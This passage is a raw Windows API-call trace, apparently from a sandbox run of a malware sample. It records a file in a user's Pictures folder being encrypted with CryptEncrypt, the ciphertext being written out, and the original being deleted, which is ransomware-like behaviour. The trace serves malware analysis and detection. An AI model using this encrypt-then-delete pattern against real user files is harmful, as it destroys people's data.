dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0087.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0087.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0087.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x7fc1) returned 0x451dfe0 [0087.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0087.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0087.360] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0087.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24e0 [0087.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0087.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0087.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0087.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0087.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x7fc1) returned 0x4516010 [0087.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0087.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0087.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0087.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0087.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0087.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0087.360] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0087.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0087.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24e0 [0087.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0087.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0087.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0087.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0087.361] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0087.361] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0087.361] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24e0 [0087.361] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0087.361] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f50 [0087.361] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0087.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f50 | out: hHeap=0x1780000) returned 1 [0087.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0087.361] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0087.361] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e24f0 [0087.361] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0087.361] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0087.361] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0087.361] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2330 [0087.361] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x7fc1) returned 0x4516010 [0087.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0087.361] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2520 [0087.361] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0087.361] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2340 [0087.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0087.361] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2340 [0087.361] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0087.361] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2350 [0087.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0087.361] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2350 [0087.361] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0087.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0087.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0087.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca2f8 [0087.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0087.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0087.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0087.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0087.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0087.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x7fc1) returned 0x4525fb0 [0087.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0087.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0087.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0087.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0087.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0087.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0087.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0087.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0087.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0087.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0087.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0087.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0087.362] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0087.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0087.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0087.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0087.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0087.363] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0087.363] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0087.363] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0087.363] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0087.363] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0087.363] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0087.363] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0087.363] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0087.363] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0087.363] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0087.363] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0087.363] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0087.363] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0087.363] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0087.363] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0087.363] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0087.363] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0087.363] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0087.363] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0087.363] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0087.363] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0087.363] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0087.363] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0087.363] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391bd0 | out: hHeap=0x1780000) returned 1 [0087.363] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0087.363] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0087.363] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0087.363] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8cc0 | out: hHeap=0x1780000) returned 1 [0087.363] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0087.364] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0087.364] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0087.364] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0087.364] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0087.364] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0087.364] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0087.364] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0087.364] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0087.364] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0087.364] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0087.364] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0087.364] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0087.364] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0087.364] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0087.364] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2668 | out: hHeap=0x1780000) returned 1 [0087.364] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0087.364] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0087.364] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdb0 | out: hHeap=0x1780000) returned 1 [0087.364] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0087.364] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0087.364] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0087.364] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0087.364] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0087.364] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0087.364] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0087.364] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0087.364] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796fe8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0087.365] CryptGetKeyParam (in: hKey=0x41ac540, dwParam=0x7, pbData=0x43e2620, pdwDataLen=0x144e260, dwFlags=0x0 | out: pbData=0x43e2620*=0x6610, pdwDataLen=0x144e260*=0x4) returned 1 [0087.365] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0087.365] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0087.365] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0087.365] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0087.365] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0087.365] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0087.365] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43ca778, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0087.365] CryptEncrypt (in: hKey=0x41ac540, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e790*=0x7fc1, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e790*=0x7fd0) returned 1 [0087.365] CharLowerBuffW (in: lpsz="byte[32721]", cchLength=0xb | out: lpsz="byte[32721]") returned 0xb [0087.365] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0087.365] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0087.365] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0087.365] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43ca8e0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0087.366] CryptEncrypt (in: hKey=0x41ac540, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x452df80*, pdwDataLen=0x144e790*=0x7fc1, dwBufLen=0x7fd0 | out: pbData=0x452df80*, pdwDataLen=0x144e790*=0x7fd0) returned 1 [0087.413] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0087.413] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0087.413] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0087.414] WriteFile (in: hFile=0x258, lpBuffer=0x451dfe8*, nNumberOfBytesToWrite=0x7fd0, lpNumberOfBytesWritten=0x144f194, lpOverlapped=0x0 | out: lpBuffer=0x451dfe8*, lpNumberOfBytesWritten=0x144f194*=0x7fd0, lpOverlapped=0x0) returned 1 [0087.415] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0087.415] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0087.415] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0087.415] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0087.416] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca1f0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0087.416] CryptDestroyKey (hKey=0x41ac540) returned 1 [0087.416] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0087.416] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0087.416] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0087.416] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0087.416] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0087.416] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0087.416] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0087.416] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0087.416] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0087.416] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0087.416] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1797108, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0087.416] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0087.416] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0087.416] FreeLibrary (hLibModule=0x756e0000) returned 1 [0087.416] CloseHandle (hObject=0x298) returned 1 [0087.416] CloseHandle (hObject=0x258) returned 1 [0087.418] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\BWdI74zS0.bmp", nBufferLength=0x7fff, lpBuffer=0x143f190, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\BWdI74zS0.bmp", lpFilePart=0x0) returned 0x26 [0087.418] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\BWdI74zS0.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\bwdi74zs0.bmp")) returned 0x20 [0087.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0087.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2220 [0087.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bc0 [0087.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2230 [0087.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0087.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2240 [0087.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cc8 [0087.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2180 [0087.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf630 [0087.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2150 [0087.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369f80 [0087.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b28 [0087.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d58 [0087.419] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\BWdI74zS0.bmp", lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb170c140, ftCreationTime.dwHighDateTime=0x1d5e759, ftLastAccessTime.dwLowDateTime=0x7eeac220, ftLastAccessTime.dwHighDateTime=0x1d5ec54, ftLastWriteTime.dwLowDateTime=0x7eeac220, ftLastWriteTime.dwHighDateTime=0x1d5ec54, nFileSizeHigh=0x0, nFileSizeLow=0x7fc1, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="BWdI74zS0.bmp", cAlternateFileName="BWDI74~1.BMP")) returned 0x41ac600 [0087.419] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\BWdI74zS0.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\bwdi74zs0.bmp")) returned 1 [0087.460] FindNextFileW (in: hFindFile=0x41ac600, lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb170c140, ftCreationTime.dwHighDateTime=0x1d5e759, ftLastAccessTime.dwLowDateTime=0x7eeac220, ftLastAccessTime.dwHighDateTime=0x1d5ec54, ftLastWriteTime.dwLowDateTime=0x7eeac220, ftLastWriteTime.dwHighDateTime=0x1d5ec54, nFileSizeHigh=0x0, nFileSizeLow=0x7fc1, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="BWdI74zS0.bmp", cAlternateFileName="BWDI74~1.BMP")) returned 0 [0087.460] FindClose (in: hFindFile=0x41ac600 | out: hFindFile=0x41ac600) returned 1 [0087.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d58 | out: hHeap=0x1780000) returned 1 [0087.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0087.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0087.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0087.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a608 | out: hHeap=0x1780000) returned 1 [0087.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0087.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bd8 | out: hHeap=0x1780000) returned 1 [0087.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0087.460] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf608 | out: hHeap=0x1780000) returned 1 [0087.460] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 